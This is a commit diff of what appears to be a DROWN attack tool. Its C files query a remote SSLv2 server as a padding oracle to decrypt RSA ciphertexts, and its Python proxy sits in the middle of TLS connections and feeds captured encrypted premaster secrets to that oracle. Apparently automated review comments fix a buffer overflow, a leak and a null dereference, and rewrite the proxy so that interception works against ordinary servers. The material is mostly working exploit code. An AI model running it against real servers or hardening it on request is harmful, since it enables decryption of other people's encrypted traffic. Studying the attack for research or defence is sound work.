
Commit e91f500

committed
Little fixes and additions
1 parent 445c3a7 commit e91f500


4 files changed

+71
-18
lines changed


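--- a/Makefile
+++ b/Makefile
@@ -1,18 +1,19 @@
-CFLAGS=-I$(SSL_PREFIX)/include
+CFLAGS=-I$(SSL_PREFIX)/include -O3
+#CFLAGS=-I$(SSL_PREFIX)/include -g
 LDFLAGS=-Wl,-rpath,$(SSL_PREFIX)/lib -L $(SSL_PREFIX)/lib -lssl -lcrypto -ldl -lm
 DECRYPT_OBJS=drown.o oracle.o trimmers.o decrypt.o utils.o
 TRIMMABLE_OBJS=trimmable.o oracle.o trimmers.o decrypt.o utils.o
 
 all: decrypt trimmable
 
 decrypt: $(DECRYPT_OBJS)
-gcc -g -o $@ $^ $(LDFLAGS)
+gcc -o $@ $^ $(LDFLAGS)
 
 trimmable: $(TRIMMABLE_OBJS)
-gcc -g -o $@ $^ $(LDFLAGS)
+gcc -o $@ $^ $(LDFLAGS)
 
 %.o: %.c
-gcc -g -c -o $@ $^ $(CFLAGS)
+gcc -c -o $@ $^ $(CFLAGS)
 
 clean:
 rm -f decrypt trimmable $(DECRYPT_OBJS) $(TRIMMABLE_OBJS)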
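Review bot: The new `CFLAGS=-I$(SSL_PREFIX)/include -O3` assigns with `=`, so the `-g` build the commented-out line below it preserves can only be recovered by editing the Makefile, and nothing on the command line can add flags either; a toggle such as `OPT ?= -O3` followed by `CFLAGS=-I$(SSL_PREFIX)/include $(OPT)` keeps one live line and lets `make OPT=-g` rebuild for debugging. Since the C sources parse bytes received from a remote SSLv2 server, adding `-Wall -Wextra` to that same line is cheap insurance and would have flagged the unused `n` paths touched in oracle.c. The commented-out variant can then go; dead build configuration tends to drift from the live one.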

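--- a/decrypt.c
+++ b/decrypt.c
@@ -28,10 +28,10 @@ void oracle_guess(drown_ctx *dctx, BIGNUM *c, BIGNUM *k, int bsize)
 }
 
 /*
-Checks whether c is valid.
+Checks whether c is valid for any length of padding we know.
 Returns the numbers of bits we can learn (0 if invalid).
 */
-int oracle_valid(drown_ctx *dctx, BIGNUM *c)
+int oracle_valid_multiple(drown_ctx *dctx, BIGNUM *c)
 {
 unsigned char enc_key[256] = {0};
 
@@ -40,13 +40,29 @@ int oracle_valid(drown_ctx *dctx, BIGNUM *c)
 
 // Run the oracle
 int size = run_oracle_valid_multiple(dctx->hostport, enc_key, 256);
-
 if(size == 0)
 return 0;
 else
 return (size + 1) * 8;
 }
 
+/*
+Checks whether c is correctly padded to 24 bytes.
+Returns the numbers of bits we can learn (0 if invalid).
+*/
+int oracle_valid(drown_ctx *dctx, BIGNUM *c)
+{
+unsigned char enc_key[256] = {0};
+
+// Convert c to array
+BN_bn2bin(c, enc_key + 256 - BN_num_bytes(c));
+
+// Run the oracle
+if(run_oracle_valid(dctx->hostport, 24, enc_key, 256))
+return 25*8;
+return 0;
+}
+
 /*
 Finds a multiplier s, so that c * (s * l_1) ** e is valid
 Updates c, s, mt, l, ?
@@ -126,7 +142,7 @@ void decrypt(drown_ctx *dctx)
 // where g is the bits of m0 (found by the oracle)
 
 
-int l = oracle_valid(dctx, c);
+int l = oracle_valid_multiple(dctx, c);
 oracle_guess(dctx, c, mt, l);
 int u = 2032;
 BN_set_bit(mt, 2033);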
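Review bot: The new `oracle_valid` (new lines 53–64) serialises c with `BN_bn2bin(c, enc_key + 256 - BN_num_bytes(c))` into a fixed 256-byte stack buffer and never checks that c fits; for a c of more than 2048 bits the offset goes negative and the write lands in front of `enc_key`. Add `if (BN_num_bytes(c) > (int)sizeof(enc_key)) return 0;` before the conversion — the matching conversion in `oracle_valid_multiple` sits at lines 38–39, outside the hunk, and presumably has the same shape and needs the same guard. The return `25*8` is `(24 + 1) * 8` in the form the sibling uses at line 46; writing it that way, or naming the 24-byte `keysize` once and using it both in the `run_oracle_valid` call and the return, keeps the two oracles in step. The header comment could also say what the 24 is, e.g. `Checks whether c decrypts to a correctly padded 24-byte key (the keysize passed to run_oracle_valid).`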

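--- a/oracle.c
+++ b/oracle.c
@@ -104,7 +104,7 @@ void send_client_hello(SSL *s)
 }
 
 
-void recv_server_hello(SSL *s)
+int recv_server_hello(SSL *s)
 {
 unsigned int n;
 oracle_ssl2_do_read(s);
@@ -133,7 +133,9 @@ void recv_server_hello(SSL *s)
 
 // CIPHER-SPECS-LENGTH
 n2s(p, n);
-assert(n > 0);
+if(n == 0)
+// cipher not supported ?
+return 0;
 
 // CIPHER-SPECS
 s->session->cipher = s->method->get_cipher_by_char(d);
@@ -147,6 +149,8 @@ void recv_server_hello(SSL *s)
 // CONNECTION-ID
 memcpy(s->s2->conn_id, d, n);
 d += n;
+
+return 1;
 }
 
 void send_client_master_key(SSL *s, unsigned char *master_key, unsigned int clear_key_length, unsigned char *encrypted_key, unsigned int encrypted_key_length)
@@ -307,7 +311,8 @@ SSL * oracle_query(char *hostport, unsigned int keysize, unsigned char *clear_ke
 // We are connected, great !
 // Now send client hello
 send_client_hello(ssl);
-recv_server_hello(ssl);
+if(!recv_server_hello(ssl))
+return NULL;
 send_client_master_key(ssl, clear_key, clear_key_length, encrypted_key, encrypted_key_length);
 // Now we can "start" the encryption
 ssl->s2->clear_text=0;
@@ -330,6 +335,8 @@ int run_oracle_valid(char *hostport, unsigned int keysize, unsigned char *encryp
 memset(clear_key, 0, keysize);
 
 SSL *ssl = oracle_query(hostport, keysize, clear_key, sizeof(clear_key), encrypted_key, encrypted_key_length);
+if(ssl == NULL)
+return 0;
 
 int res = oracle_check_valid(ssl);
 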
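Review bot: The new early exit in `oracle_query` (new lines 314–315) returns NULL right after `send_client_hello(ssl)` without tearing `ssl` down; if `ssl` and its socket are created by this function above the hunk, as the surrounding flow suggests, they leak on every "cipher not supported" reply, and this function is called once per oracle query. Make it `if(!recv_server_hello(ssl)) { SSL_free(ssl); return NULL; }`, or reuse whatever cleanup the function's other failure paths perform. Only `run_oracle_valid` gained an `ssl == NULL` check; `run_oracle_valid_multiple`, which decrypt.c calls and which is not in this diff, needs the same guard if it also goes through `oracle_query`, otherwise `oracle_check_valid(NULL)` dereferences a null pointer. The `// cipher not supported ?` comment at new line 137 could state the decision rather than ask it, e.g. `// CIPHER-SPECS-LENGTH of 0: server offered no cipher, treat the query as failed`. `recv_server_hello`, `oracle_query` and `run_oracle_valid` all start or end outside the hunks.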

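--- a/tlsgandalf.py
+++ b/tlsgandalf.py
@@ -22,7 +22,7 @@ def handshakeProxy(c_conn, s_conn, oracle):
 else: break
 clientHello = result
 
-c_conn.version = clientHello.client_version
+c_conn.version = (3, 1) # TODO : Hardcoded version ?
 
 for result in c_conn._sendMsg(clientHello):
 yield result
@@ -45,14 +45,27 @@ def handshakeProxy(c_conn, s_conn, oracle):
 # CERTIFICATE S -> C
 for result in c_conn._getMsg(ContentType.handshake,
 HandshakeType.certificate,
-serverHello.certificate_type):
+serverHello.certificate_type): # FIXME : we should only allow RSA
 if result in (0,1): yield result
 else: break
-certificate = result
+serverCertificate = result
 
-for result in s_conn._sendMsg(certificate):
+for result in s_conn._sendMsg(serverCertificate):
 yield result
 
+
+# TODO : this part is optional
+# CERTIFICATE REQUEST S -> C
+for result in c_conn._getMsg(ContentType.handshake,
+HandshakeType.certificate_request):
+if result in (0,1): yield result
+else: break
+certificate_request = result
+
+for result in s_conn._sendMsg(certificate_request):
+yield result
+
+
 # SERVER HELLO DONE S -> C
 for result in c_conn._getMsg(ContentType.handshake,
 HandshakeType.server_hello_done):
@@ -63,6 +76,19 @@ def handshakeProxy(c_conn, s_conn, oracle):
 for result in s_conn._sendMsg(serverHelloDone):
 yield result
 
+
+# TODO : this part is optional
+# CERTIFICATE C -> S
+for result in s_conn._getMsg(ContentType.handshake,
+HandshakeType.certificate,
+serverHello.certificate_type): # FIXME : we should allow anything ?
+if result in (0,1): yield result
+else: break
+clientCertificate = result
+
+for result in c_conn._sendMsg(clientCertificate):
+yield result
+
 # CLIENT KEY EXCHANGE C -> S
 for result in s_conn._getMsg(ContentType.handshake,
 HandshakeType.client_key_exchange,
@@ -75,8 +101,11 @@ def handshakeProxy(c_conn, s_conn, oracle):
 epms = clientKeyExchange.encryptedPreMasterSecret
 if not oracle(epms):
 # YOU SHALL NOT PASS !
+print("You shall not pass")
 return
 
+print("Found trimmer !")
+
 print(hexlify(epms).decode())
 
 # If it's ok, continue
@@ -110,9 +139,9 @@ def handshakeProxy(c_conn, s_conn, oracle):
 
 # Get parameters
 listenaddr, connectaddr, oracleaddr, cert = sys.argv[1:]
-listenaddr = (listenaddr.split(':')[0], int(listenaddr.split(':')[1]))
-connectaddr = (connectaddr.split(':')[0], int(connectaddr.split(':')[1]))
-oracleaddr = (oracleaddr.split(':')[0], int(oracleaddr.split(':')[1]))
+listenaddr = (listenaddr.rsplit(':', 1)[0], int(listenaddr.rsplit(':', 1)[1]))
+connectaddr = (connectaddr.rsplit(':', 1)[0], int(connectaddr.rsplit(':', 1)[1]))
+oracleaddr = (oracleaddr.rsplit(':', 1)[0], int(oracleaddr.rsplit(':', 1)[1]))
 
 oracle = lambda epms: not subprocess.call(["./trimmable", '{}:{}'.format(*oracleaddr), cert, hexlify(epms)])
 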
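Review bot: The two new blocks labelled `# TODO : this part is optional` (new lines 57–66 and 80–89) are unconditional in the code: `c_conn._getMsg(ContentType.handshake, HandshakeType.certificate_request)` always runs, so a server that sends ServerHelloDone straight after its Certificate — the normal no-client-auth case — hands `_getMsg` an unexpected handshake type and the proxy fails before the ClientKeyExchange it exists to intercept, and `s_conn._getMsg(..., HandshakeType.certificate)` fails the same way for a client that sends ClientKeyExchange directly. Read the next server message allowing either type, dispatch on what arrived, and remember whether a CertificateRequest was seen so the client Certificate is only awaited in that case; this assumes `_getMsg` accepts a tuple of handshake types and that messages expose `handshakeType`, as tlslite's do — confirm against the library in use. `handshakeProxy` begins before this hunk and continues after it, and the `serverHelloDone = result` assignment it relies on sits between the hunks.
```python
# CERTIFICATE REQUEST (optional) or SERVER HELLO DONE  S -> C
for result in c_conn._getMsg(ContentType.handshake,
                             (HandshakeType.certificate_request,
                              HandshakeType.server_hello_done)):
    if result in (0,1): yield result
    else: break
msg = result

clientAuth = msg.handshakeType == HandshakeType.certificate_request
if clientAuth:
    for result in s_conn._sendMsg(msg):
        yield result
    # SERVER HELLO DONE S -> C
    for result in c_conn._getMsg(ContentType.handshake,
                                 HandshakeType.server_hello_done):
        if result in (0,1): yield result
        else: break
    msg = result
serverHelloDone = msg

for result in s_conn._sendMsg(serverHelloDone):
    yield result

# CERTIFICATE C -> S, only when the server asked for one
if clientAuth:
    # … unchanged: the new client Certificate relay block, indented under this if …

# … unchanged: CLIENT KEY EXCHANGE C -> S and the oracle check …
```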
